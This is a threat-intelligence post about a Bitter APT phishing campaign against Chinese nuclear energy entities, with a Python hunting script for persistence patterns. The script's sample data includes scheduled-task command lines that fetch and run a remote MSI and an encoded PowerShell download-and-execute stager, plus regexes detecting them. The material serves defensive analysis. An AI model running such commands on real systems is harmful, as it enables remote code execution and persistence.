Verticals Targeted: Energy
A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.
- Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
- The threat actors used a phishing lure masquerading as a conference invitation from an embassy attaché.
- The threat actors used both CHM and Excel payloads and employed multiple techniques in an attempt to evade detection and analysis.
Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with phishing emails whose lures pretended to come from the Embassy of Kyrgyzstan in Beijing, inviting the recipient to a conference related to their field. Each email carries an attached RAR archive containing either a CHM or an Excel payload, and the email body is written to entice the recipient into opening the archive. To lend the email legitimacy, the threat actors used the name of an actual attaché at the embassy.
In the campaign, the threat actors used multiple malicious payloads, each compressed into a RAR archive. The payloads are intended to establish persistence on the victim machine and to download additional malware.
The Excel payloads use an Equation Editor exploit to create two scheduled tasks: one that downloads the next-stage payload and a second that attempts to execute the newly downloaded payload.
The CHM files (Microsoft Compiled HTML Help) embed script that executes arbitrary code and creates scheduled tasks when the help file is opened. This gives the threat actor persistence on the victim machine with very little user interaction beyond opening the file. Because the CHM container is natively LZX-compressed, the embedded HTML and script are not visible to static scanners unless the archive is decompressed first, so analysts should extract the CHM contents before signature scanning. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LoLBin), to install a remote MSI payload hosted on the C2 server. Another version performs similar activity through a scheduled task that runs an encoded PowerShell command.
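The two scheduled-task patterns above (msiexec pulling a remote MSI, and an encoded PowerShell command) are easy to hunt for in process-creation telemetry once you know the shape of the command lines. The script below is an added example written for this post; it is not code from PolySwarm or from the Intezer report. It scans command lines for those two patterns, notes whether the action is being registered through schtasks, and decodes the Base64/UTF-16LE PowerShell payload so an analyst can read it. The log lines, task names, and URLs are constructed placeholders, not indicators from the campaign.

```python
"""Hunt for msiexec-remote-MSI and encoded-PowerShell scheduled tasks.

Added example, not from the original write-up. Sample command lines,
task names and hosts below are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


# --- constructed sample telemetry: one process command line per event -------
def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_COMMAND_LINES = [
    # scheduled task whose action is msiexec installing an MSI from a URL
    r'schtasks /create /sc minute /mo 5 /tn "OfficeUpdate" '
    r'/tr "msiexec.exe /i http://example.invalid/update.msi /q"',
    # scheduled task whose action is a hidden, encoded PowerShell stage
    'schtasks /create /sc onlogon /tn "SysCheck" /tr "powershell.exe -w hidden -enc '
    + _encode_ps('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s.ps1")')
    + '"',
    # benign: local MSI install, no scheduled task, no remote source
    r"msiexec.exe /i C:\installers\7zip.msi /qn",
    # benign: scheduled task running a local script
    r'schtasks /create /sc daily /tn "Backup" /tr "C:\scripts\backup.cmd"',
]

# --- detection patterns -----------------------------------------------------
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
# msiexec /i with an http(s) source: the remote-MSI LoLBin pattern
MSIEXEC_REMOTE = re.compile(r"msiexec(?:\.exe)?\s+.*?/i\s+https?://", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\s.*?(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    rule: str
    scheduled_task: bool
    command_line: str
    decoded_payload: Optional[str] = None


def decode_encoded_powershell(b64: str) -> Optional[str]:
    """Reverse -EncodedCommand: Base64 -> UTF-16LE text. None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_command_line(cmd: str) -> List[Finding]:
    findings: List[Finding] = []
    in_task = bool(SCHTASKS_CREATE.search(cmd))
    if MSIEXEC_REMOTE.search(cmd):
        findings.append(Finding("msiexec_remote_msi", in_task, cmd))
    m = ENCODED_PS.search(cmd)
    if m:
        findings.append(
            Finding("powershell_encoded", in_task, cmd, decode_encoded_powershell(m.group(1)))
        )
    return findings


def scan(lines: List[str]) -> List[Finding]:
    out: List[Finding] = []
    for line in lines:
        out.extend(scan_command_line(line))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"[{f.rule}] scheduled_task={f.scheduled_task}")
        print("  cmd:", f.command_line)
        if f.decoded_payload:
            print("  decoded:", f.decoded_payload)
```

Run against EDR or Sysmon Event ID 1 command lines; the msiexec rule deliberately ignores local `.msi` paths so routine installs do not fire, and the decoded PowerShell text is what you would then pivot on for the download URL.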
Who is Bitter APT?
Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.
PolySwarm has multiple samples associated with this campaign.
You can use the following CLI command to search for all Bitter APT samples in our portal:
$ polyswarm link list -f BitterAPT